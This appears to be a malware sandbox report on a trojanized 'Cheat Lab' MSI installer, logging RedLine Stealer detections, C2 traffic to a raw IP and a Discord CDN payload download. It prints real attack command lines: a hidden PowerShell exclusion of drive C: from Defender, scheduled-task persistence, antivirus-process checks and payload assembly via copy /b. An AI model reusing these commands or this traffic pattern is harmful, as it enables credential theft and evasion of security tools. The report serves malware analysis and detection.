Jan 12, 2024 23:13:11.479496956 CET | 276 | OUT | PUT /task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
                                                          Content-Type: application/json
                                                          User-Agent: Winter
                                                          Host: 213.248.43.48
                                                          Content-Length: 95
                                                          Cache-Control: no-cache
                                                          Data Ascii: {"data":"YWMsOWEsZTMsYWUsOTgsOTUsOGIsYTMsODAsODQsOTEsYjcsYzksZGMsZDAsYWMsYjYsZWQsOTcsYzIsOWU="}
                                                          Jan 12, 2024 23:13:11.921124935 CET | 524 | IN | HTTP/1.1 204 No Content
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Fri, 12 Jan 2024 22:13:11 GMT
                                                          Connection: keep-alive
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7r5d9KUEQJeQd72uiXGzEGx9jMRr0ZBCkFCB63etSU6Sxmvg8o1AGbya08HnpbvufekouoHFw2sS6yOhENReympF4LY8J%2F0yoTSWRYji2Szaj%2Fq82QBwl60O7CY4eP0%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          CF-RAY: 8448becbea84b987-AMS
                                                          alt-svc: h3=":443"; ma=86400


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.4 | 49738 | 162.159.130.233 | 80 | 7720 | C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 12, 2024 23:12:37.991643906 CET | 174 | OUT | GET /attachments/1194585859404599367/1194585905420320788/2 HTTP/1.1
                                                          Content-Type: application/json
                                                          User-Agent: Winter
                                                          Host: cdn.discordapp.com
                                                          Cache-Control: no-cache
                                                          Jan 12, 2024 23:12:38.102488995 CET | 1166 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 12 Jan 2024 22:12:38 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=3600
                                                          Expires: Fri, 12 Jan 2024 23:12:38 GMT
                                                          Location: https://cdn.discordapp.com/attachments/1194585859404599367/1194585905420320788/2
                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                          Set-Cookie: __cf_bm=NQ8hsNROJ4ECPUpzUwnJbG9uTPemeuU4i_wUYe2S75I-1705097558-1-AePzRORzeAr0iGC0qs1nWkncA+Psk0Y78fhnqrbDbP9Mw6fKoc9CI0A1E5NudBf115BY9/I6p8WSeSfkX3sogw4=; path=/; expires=Fri, 12-Jan-24 22:42:38 GMT; domain=.discordapp.com; HttpOnly; SameSite=None
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mLJmWaCT2QWk3sir2Xohl0yWbVug1aBYwejXNyjHKWJuYsgpbNubjd7g8GS9NshhySetRhL7Ri7LDVH9N1Re%2BiFKNbh5vO1i8M1xMT54lcrsHNH%2BBOLRIHnAIit0go3TFNF8Iw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Set-Cookie: _cfuvid=Gm5WzVXIL6HX9Y_BYTeLwclnnr06fyZHUxgDMI2R4MA-1705097558055-0-604800000; path=/; domain=.discordapp.com; HttpOnly
                                                          Server: cloudflare
                                                          CF-RAY: 8448bdf9cf703958-IAD
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          0 | 192.168.2.4 | 49739 | 162.159.130.233 | 443 | 7720 | C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-01-12 22:12:38 UTC | 408 | OUT | GET /attachments/1194585859404599367/1194585905420320788/2 HTTP/1.1
                                                          User-Agent: Winter
                                                          Cache-Control: no-cache
                                                          Host: cdn.discordapp.com
                                                          Connection: Keep-Alive
                                                          Cookie: __cf_bm=NQ8hsNROJ4ECPUpzUwnJbG9uTPemeuU4i_wUYe2S75I-1705097558-1-AePzRORzeAr0iGC0qs1nWkncA+Psk0Y78fhnqrbDbP9Mw6fKoc9CI0A1E5NudBf115BY9/I6p8WSeSfkX3sogw4=; _cfuvid=Gm5WzVXIL6HX9Y_BYTeLwclnnr06fyZHUxgDMI2R4MA-1705097558055-0-604800000
                                                          2024-01-12 22:12:38 UTC | 1275 | IN | HTTP/1.1 200 OK
                                                          Date: Fri, 12 Jan 2024 22:12:38 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 3182723
                                                          Connection: close
                                                          CF-Ray: 8448bdfccd001fec-IAD
                                                          CF-Cache-Status: MISS
                                                          Accept-Ranges: bytes, bytes
                                                          Cache-Control: public, max-age=31536000
                                                          Content-Disposition: attachment; filename="2"
                                                          ETag: "376559befaa721cb4b27d1bf5d7ca956"
                                                          Expires: Sat, 11 Jan 2025 22:12:38 GMT
                                                          Last-Modified: Wed, 10 Jan 2024 10:17:54 GMT
                                                          Vary: Accept-Encoding
                                                          Alt-Svc: h3=":443"; ma=86400
                                                          x-goog-generation: 1704881874322584
                                                          x-goog-hash: crc32c=1FbHjQ==
                                                          x-goog-hash: md5=N2VZvvqnIctLJ9G/XXypVg==
                                                          x-goog-metageneration: 1
                                                          x-goog-storage-class: STANDARD
                                                          x-goog-stored-content-encoding: identity
                                                          x-goog-stored-content-length: 3182723
                                                          X-GUploader-UploadID: ABPtcPrYI9rhMgY1Fmg3mwKl9xO8JVSrWhXD6dLO2OPTWSnMu__njO4EOYiIacjE4SzmM5b65aRDfxFbXw
                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B7rwoeLqiHy6xxlY0cVYhaMqlaKXxLNKMQ7cpU6kMCWdRGzGD1SMFhQG%2Fj7TamajB%2F0GBeg5ivX4CqJNQU%2BBrmkHM53gH7TmVOT163V5EfACLf%2FEqy%2BMHcApZj1d3pm7PavbtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare



                                                          Target ID:0
                                                          Start time:23:11:56
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\msiexec.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.2.msi"
                                                          Imagebase:0x7ff62a580000
                                                          File size:69'632 bytes
                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:23:11:56
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\msiexec.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                          Imagebase:0x7ff62a580000
                                                          File size:69'632 bytes
                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:2
                                                          Start time:23:11:56
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 30FEA9F9E3926AA1391EB6E446524DF5 C
                                                          Imagebase:0xbb0000
                                                          File size:59'904 bytes
                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:23:12:01
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding F28D3D46A9F6C7BEC118E0AE5C649DD3
                                                          Imagebase:0xbb0000
                                                          File size:59'904 bytes
                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:23:12:02
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss87C.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi86A.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr86B.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr86C.txt" -propSep " :<->: " -testPrefix "_testValue."
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:23:12:02
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:23:12:03
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:23:12:20
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding AF5482846545A3FBF6C3EBE62A323063 E Global\MSI0000
                                                          Imagebase:0xbb0000
                                                          File size:59'904 bytes
                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:23:12:21
                                                          Start date:12/01/2024
                                                          Path:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\config
                                                          Imagebase:0x7ff7bad30000
                                                          File size:789'504 bytes
                                                          MD5 hash:E1985F2668B7617E122FE727315B6D07
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:23:12:22
                                                          Start date:12/01/2024
                                                          Path:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\config
                                                          Imagebase:0x7ff7bad30000
                                                          File size:789'504 bytes
                                                          MD5 hash:E1985F2668B7617E122FE727315B6D07
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:23:13:10
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -Command "Register-ScheduledTask -TaskName 'Y29ubmVjdDc0MQ==' -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe') -Trigger (New-ScheduledTaskTrigger -At (Get-Date).AddMinutes(1) -Once) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable) -Force"
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:23:13:10
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:23:13:19
                                                          Start date:12/01/2024
                                                          Path:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                          Imagebase:0x400000
                                                          File size:1'073'657'860 bytes
                                                          MD5 hash:B9DD622108F62A2288DEB12C8A7D85BA
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:23:13:20
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:23:13:22
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /k cmd < Roommates & exit
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:23:13:22
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:23:13:23
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:22
                                                          Start time:23:13:23
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist
                                                          Imagebase:0xc0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:23
                                                          Start time:23:13:23
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                          Imagebase:0x890000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:24
                                                          Start time:23:13:24
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist
                                                          Imagebase:0xc0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:25
                                                          Start time:23:13:24
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "wrsa.exe"
                                                          Imagebase:0x890000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:26
                                                          Start time:23:13:25
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd /c mkdir 28945
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:27
                                                          Start time:23:13:25
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd /c copy /b Dns + Pontiac + Milfhunter + Ruling + Supervisor 28945\Carbon.pif
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:28
                                                          Start time:23:13:25
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd /c copy /b Entered + Conferences 28945\w
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:29
                                                          Start time:23:13:25
                                                          Start date:12/01/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif
                                                          Wow64 process (32bit):true
                                                          Commandline:28945\Carbon.pif 28945\w
                                                          Imagebase:0x8f0000
                                                          File size:946'784 bytes
                                                          MD5 hash:848164D084384C49937F99D5B894253E
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2893690929.00000000039AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2894225231.00000000039A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2894002689.0000000003959000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2951972819.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2894424466.00000000039FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2950664507.00000000039A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2893791274.00000000038DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2950664507.0000000003A02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2894095671.0000000004501000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2902535107.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2954888933.00000000039AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2894335266.0000000003958000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2894468357.00000000038FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2951833914.0000000003A02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2950664507.0000000003907000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 5%, ReversingLabs
                                                          Has exited:true

                                                          Target ID:30
                                                          Start time:23:13:25
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:ping -n 5 localhost
                                                          Imagebase:0x8e0000
                                                          File size:18'944 bytes
                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:31
                                                          Start time:23:14:02
                                                          Start date:12/01/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe
                                                          Imagebase:0xfc0000
                                                          File size:47'584 bytes
                                                          MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.3026594821.0000000001392000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.3034718882.000000000336B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.3034718882.000000000336B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.3034718882.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Has exited:true

                                                          Target ID:32
                                                          Start time:23:14:13
                                                          Start date:12/01/2024
                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
                                                          Imagebase:0x460000
                                                          File size:4'608 bytes
                                                          MD5 hash:A5CE3ABA68BDB438E98B1D0C70A3D95C
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET
                                                          Antivirus matches:
                                                          • Detection: 3%, ReversingLabs
                                                          Has exited:false

                                                          Target ID:33
                                                          Start time:23:14:21
                                                          Start date:12/01/2024
                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
                                                          Imagebase:0xe90000
                                                          File size:4'608 bytes
                                                          MD5 hash:A5CE3ABA68BDB438E98B1D0C70A3D95C
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET
                                                          Has exited:false


                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1760094365.00007FFD9B4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b4d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9e76a0c9d31543534c94a957b0c32f35aaa2e6749b02bd52dff83935ff22ecf9
                                                            • Instruction ID: 53817653edc9e6a25352b073426041dabb2f0a97978e1769bf445c4911da4cd5
                                                            • Opcode Fuzzy Hash: 9e76a0c9d31543534c94a957b0c32f35aaa2e6749b02bd52dff83935ff22ecf9
                                                            • Instruction Fuzzy Hash: 9FD15972B0EA8D0FE7A5ABA888655757BE1EF95314B0902FFD44CCB0E3D928B905D341
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: efb6ac4c7f1c083c065e3fc26b706f324f4b7fbc0bed87a1b712f4ec1e39dc6c
                                                            • Instruction ID: c74760f5fe24fc21cc8bf7a5f6e1193ba82a4b71958960d5a4c6383aaacdd33e
                                                            • Opcode Fuzzy Hash: efb6ac4c7f1c083c065e3fc26b706f324f4b7fbc0bed87a1b712f4ec1e39dc6c
                                                            • Instruction Fuzzy Hash: CCC17F31A18A4D8FDF98DF5CC495AA977E2FFA8304F15426AD449D7295CA34E881CBC0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d818b791c4d3ecfb937045576d03fc4daf725d1165dfb7f313647ef449aedbdf
                                                            • Instruction ID: ed946b564e73085666c80e0124ee8580fc3cca55178969a7c2423df6509978b8
                                                            • Opcode Fuzzy Hash: d818b791c4d3ecfb937045576d03fc4daf725d1165dfb7f313647ef449aedbdf
                                                            • Instruction Fuzzy Hash: F3415A72A1DE8E4FEF188B5CDC1E6A97BE0FF55320F04423FD48983192DA2579018B82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fa1a9a5b28c98c876506d10409173c52b029b388c94542a313fa8ee386da2284
